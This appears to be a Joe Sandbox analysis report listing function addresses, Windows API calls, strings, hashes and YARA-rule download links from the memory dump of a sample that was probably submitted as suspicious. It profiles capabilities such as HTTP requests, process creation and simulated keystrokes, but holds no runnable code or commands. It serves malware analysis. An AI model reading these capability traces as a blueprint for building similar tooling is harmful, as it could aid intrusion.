Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 6136b1d292f8b8f354ee7022bb0202585e39e7d449c8e304fc89764e03b7f850
Instruction ID: ef7dc41984a89fb67c86727ed7e176f561f8794e34a4e257e2256663753f5543
Opcode Fuzzy Hash: 6136b1d292f8b8f354ee7022bb0202585e39e7d449c8e304fc89764e03b7f850
Instruction Fuzzy Hash: D4C177B1608305AFC700DF24C98496BB7E9FF89398F00492DF98A9B251DB71ED46DB52

Function 00F07990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00F07A6C

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: b47c42897a4c383ed4d2bbf8dbd2647d1ce7a424d050e71d4823c7cee75a76ac
Instruction ID: 2788ef693978d0a10bea8ec07341963cd033bcd3941cd374d37fb21fed1500cb
Opcode Fuzzy Hash: b47c42897a4c383ed4d2bbf8dbd2647d1ce7a424d050e71d4823c7cee75a76ac
Instruction Fuzzy Hash: C9B16D71E083199FEB10EF94C885BBEB7F4EF49321F2444A9E501E7291D774A941EBA0

Function 00F011CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00F011F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F00268,?,00000001), ref: 00F01204
GetWindowThreadProcessId.USER32(00000000), ref: 00F0120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F00268,?,00000001), ref: 00F0121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00F0122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F00268,?,00000001), ref: 00F01245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F00268,?,00000001), ref: 00F01257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F00268,?,00000001), ref: 00F0129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F00268,?,00000001), ref: 00F012B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F00268,?,00000001), ref: 00F012BC

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 8365255c7db5893b99be430b3ec0f3333858665b1547fc8d522aa84b99ec33c7
Instruction ID: 6f690a5651d17ccab31416fcdbc0d4fe04b72f7215c4c465e7935e78a28a0d5e
Opcode Fuzzy Hash: 8365255c7db5893b99be430b3ec0f3333858665b1547fc8d522aa84b99ec33c7
Instruction Fuzzy Hash: AE319C75A10208FBEB309F54ED88FAA7BB9FB64321F114125F910C62E0E7B49D44BB60

Function 00EAFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00EAFAA6
OleUninitialize.OLE32(?,00000000), ref: 00EAFB45
UnregisterHotKey.USER32(?), ref: 00EAFC9C
DestroyWindow.USER32(?), ref: 00EE45D6
FreeLibrary.KERNEL32(?), ref: 00EE463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EE4668

Strings

close all, xrefs: 00EAFAA1

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 1174e499598f05162b4f3a473ee49c9bdf3c2f854c107e65ce987c299958c607
Instruction ID: a7319f4079f11ef2c2abb6818c09c59abda8b13431985d178d841efd492faa19
Opcode Fuzzy Hash: 1174e499598f05162b4f3a473ee49c9bdf3c2f854c107e65ce987c299958c607
Instruction Fuzzy Hash: 46A19271301216CFCB28EF55C594A69F3A0BF0A714F1162ADE80ABB2A1DB30ED16CF50

Function 00EFA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00EFA439), ref: 00EFA377

Strings

INSTANCE, xrefs: 00EFA285
CLASS, xrefs: 00EFA0F6
REGEXPCLASS, xrefs: 00EFA13C
CLASSNN, xrefs: 00EFA119
NAME, xrefs: 00EFA1A9
TEXT, xrefs: 00EFA2AE

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 45ace69d4ad2484ad45927863a26744d5e40168d0b93a9971ff6a9c140cb8f12
Instruction ID: 33bf983735ec993087a54ba23367a6be35e91e52bbad69c9bd1f542ef60274a7
Opcode Fuzzy Hash: 45ace69d4ad2484ad45927863a26744d5e40168d0b93a9971ff6a9c140cb8f12
Instruction Fuzzy Hash: 8C91D8B0604609DADB08EFA0C481BFDFBB4BF04304F58A129DA5DBB251DF316959DBA1

Function 00EA2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00EA2EAE

Part of subcall function 00EA1DB3: GetClientRect.USER32(?,?), ref: 00EA1DDC
Part of subcall function 00EA1DB3: GetWindowRect.USER32(?,?), ref: 00EA1E1D
Part of subcall function 00EA1DB3: ScreenToClient.USER32(?,?), ref: 00EA1E45

GetDC.USER32 ref: 00EDCD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00EDCD45
SelectObject.GDI32(00000000,00000000), ref: 00EDCD53
SelectObject.GDI32(00000000,00000000), ref: 00EDCD68
ReleaseDC.USER32(?,00000000), ref: 00EDCD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00EDCDFB

Strings

U, xrefs: 00EDCCD0

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 4992cfa9d3aad686858b646e41684106567810a93ddee4a0e3e2835bda379eac
Instruction ID: ba8520781b02d5168402a9c1c62643e3d18fff3614e8a2cee1920be3a2324c8f
Opcode Fuzzy Hash: 4992cfa9d3aad686858b646e41684106567810a93ddee4a0e3e2835bda379eac
Instruction Fuzzy Hash: D671A53150020ADFCF218F64CC84AEA7BB6FF49394F24527AEE557A266C7319C92DB50

Function 00F11A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F11A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F11A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00F11ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F11AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F11AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00F11B10
InternetCloseHandle.WININET(00000000), ref: 00F11B57

Part of subcall function 00F12483: GetLastError.KERNEL32(?,?,00F11817,00000000,00000000,00000001), ref: 00F12498
Part of subcall function 00F12483: SetEvent.KERNEL32(?,?,00F11817,00000000,00000000,00000001), ref: 00F124AD

Strings

, xrefs: 00F11B01

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 11351fa5d4992ce7abe098aa32d3a7e121777298dcdeabf06f751bdb55712c9f
Instruction ID: d89342f08dd1fb3587fe7fb1d476e4bf52878cc59647b32a6b125ab3065a74ff
Opcode Fuzzy Hash: 11351fa5d4992ce7abe098aa32d3a7e121777298dcdeabf06f751bdb55712c9f
Instruction Fuzzy Hash: 7B417DB1911219BFEB11CF50CC89FFA7BACFF48354F00412AFA059A141E7749E95ABA0

Function 00F18C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F2F910), ref: 00F18D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F2F910), ref: 00F18D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F18ED6
SysFreeString.OLEAUT32(?), ref: 00F18F00

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 7162d467f2232b340d17e1a071644f3eae3eb05ae8d76884f65b472eebf34191
Instruction ID: e84068eea3c381a966811ff78aed3660321c3df03363f805bda28c8dfd8857da
Opcode Fuzzy Hash: 7162d467f2232b340d17e1a071644f3eae3eb05ae8d76884f65b472eebf34191
Instruction Fuzzy Hash: 3FF12C71A00109AFCF14DFA4C984EEEB7B5FF49354F108458F505AB251DB71AE86DB90

Function 00F1F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F1F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F1F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F1F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F1F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F1F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F1FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F1FA7C
CloseHandle.KERNEL32(?), ref: 00F1FAAB
CloseHandle.KERNEL32(?), ref: 00F1FB22

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 2414e7f63b9064a0b25eea3699a9992b7d8ca6eee9baa243de65c46cca04d596
Instruction ID: 91bc263b5e92703da250a19c08f6b3ff6a4a31bbfc516a0033b629eb3f94ed72
Opcode Fuzzy Hash: 2414e7f63b9064a0b25eea3699a9992b7d8ca6eee9baa243de65c46cca04d596
Instruction Fuzzy Hash: EAE1A4316043019FC714EF24C891BAABBE1EF89364F14856DF8959F2A2CB35EC85DB52

Function 00F04CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F0466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F03697,?), ref: 00F0468B

Part of subcall function 00F0466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F03697,?), ref: 00F046A4

Part of subcall function 00F04A31: GetFileAttributesW.KERNEL32(?,00F0370B), ref: 00F04A32

lstrcmpiW.KERNEL32(?,?), ref: 00F04D40
_wcscmp.LIBCMT ref: 00F04D5A
MoveFileW.KERNEL32(?,?), ref: 00F04D75

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 7ea00a0a07aefaddfed76f6456846520aba2a9a2e7163ed606ecf6f77115b970
Instruction ID: ba820bc9060545a74776638ab2c1ad09b2ab713585694af849e5f2f5bc83c560
Opcode Fuzzy Hash: 7ea00a0a07aefaddfed76f6456846520aba2a9a2e7163ed606ecf6f77115b970
Instruction Fuzzy Hash: 085164B25083459BC724DBA0DC81EDFB3ECAF85350F00092EB689D3191EE35B589DB66

Function 00F28645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F286FF

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 524e398175eff4314e3343d5ef3d4e8bc2acc4a0bd645ae364db10fd4a9e1503
Instruction ID: b3b092993d50296d083ad4ed9a3ae6117841380ed7035abe3b0fa5a4b49ff50a
Opcode Fuzzy Hash: 524e398175eff4314e3343d5ef3d4e8bc2acc4a0bd645ae364db10fd4a9e1503
Instruction Fuzzy Hash: AC51A131902264BFDB209F28EC85FA93BA4EB057A0F604125F911E61A1CF75AD82FB50

Function 00EA2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00EDC2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EDC319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00EDC331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00EDC34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00EDC370
DestroyIcon.USER32(00000000), ref: 00EDC37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00EDC39C
DestroyIcon.USER32(?), ref: 00EDC3AB

Part of subcall function 00F2A4AF: DeleteObject.GDI32(00000000), ref: 00F2A4E8

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: ed6739ccf59814c3f882d38396064d2a40be1c2597ce1bde221a293997b771c0
Instruction ID: 6d2fa4061536d011be8a502de50743d353095d4ec8c3b7f2735c3967d187df89
Opcode Fuzzy Hash: ed6739ccf59814c3f882d38396064d2a40be1c2597ce1bde221a293997b771c0
Instruction Fuzzy Hash: 4C516A70610209AFDB24DF68CC45FAA7BB5EB09754F105529FA02BB2A0D770AD51EB60

Function 00EF966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EFA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EFA84C
Part of subcall function 00EFA82C: GetCurrentThreadId.KERNEL32 ref: 00EFA853
Part of subcall function 00EFA82C: AttachThreadInput.USER32(00000000,?,00EF9683,?,00000001), ref: 00EFA85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 00EF968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00EF96AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00EF96AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 00EF96B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00EF96D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00EF96D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 00EF96E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00EF96F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00EF96FB

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: dacd699e29b4ecfcc1eb6844ff56982ba9afa15b49b8cfd826b7c3a860c14cd8
Instruction ID: 4d3ad6f2c07d6a83570dc53df7aa5c54298123d05d153e092f13aa97c0f37c0b
Opcode Fuzzy Hash: dacd699e29b4ecfcc1eb6844ff56982ba9afa15b49b8cfd826b7c3a860c14cd8
Instruction Fuzzy Hash: F211C2B192021CBEF6206B60DC49F7A3E6DDB4C791F511435F344AB0A1CAF25C11AAA4

Function 00EF8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00EF853C,00000B00,?,?), ref: 00EF892A
HeapAlloc.KERNEL32(00000000,?,00EF853C,00000B00,?,?), ref: 00EF8931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00EF853C,00000B00,?,?), ref: 00EF8946
GetCurrentProcess.KERNEL32(?,00000000,?,00EF853C,00000B00,?,?), ref: 00EF894E
DuplicateHandle.KERNEL32(00000000,?,00EF853C,00000B00,?,?), ref: 00EF8951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00EF853C,00000B00,?,?), ref: 00EF8961
GetCurrentProcess.KERNEL32(00EF853C,00000000,?,00EF853C,00000B00,?,?), ref: 00EF8969
DuplicateHandle.KERNEL32(00000000,?,00EF853C,00000B00,?,?), ref: 00EF896C
CreateThread.KERNEL32(00000000,00000000,00EF8992,00000000,00000000,00000000), ref: 00EF8986

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 0da8c5f7cf20e3fb909e27206fad8e5ec052e48bd69f64abb50b9d5416f81f32
Instruction ID: 4342319ecf1eab6977a6fe1db826e8239a27c6530ee3440b722f40eeef3df63a
Opcode Fuzzy Hash: 0da8c5f7cf20e3fb909e27206fad8e5ec052e48bd69f64abb50b9d5416f81f32
Instruction Fuzzy Hash: 6F01BBB5650308FFE720ABA5DD4EF6B3BACEB89711F408421FA05DB1A1CA709815DB21

Function 00F19B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00F19B7B
NULL Pointer assignment, xrefs: 00F19BA4, 00F19EC8

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: e3b5bfb947b2167a6c315e780f9d664599fb0ff55ab05e9035f991e170b8507f
Instruction ID: c0bbe6ee5cdb5b6975a32e11fa2a8f88beafacc4ec068ee1cfe7d91e1908cf0a
Opcode Fuzzy Hash: e3b5bfb947b2167a6c315e780f9d664599fb0ff55ab05e9035f991e170b8507f
Instruction Fuzzy Hash: 40C1B271E0420A9BDF10DF98D894BEEB7F5FB48314F148469E945A7280E7B0AD85DBE0

Function 00F19113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F19167
VariantInit.OLEAUT32(?), ref: 00F19238
VariantInit.OLEAUT32(?), ref: 00F19339
VariantClear.OLEAUT32(?), ref: 00F19343
VariantClear.OLEAUT32(?), ref: 00F193A0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00F1931C
Null Object assignment in FOR..IN loop, xrefs: 00F191C8, 00F192F6, 00F193AE

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Variant$ClearInit$_memset
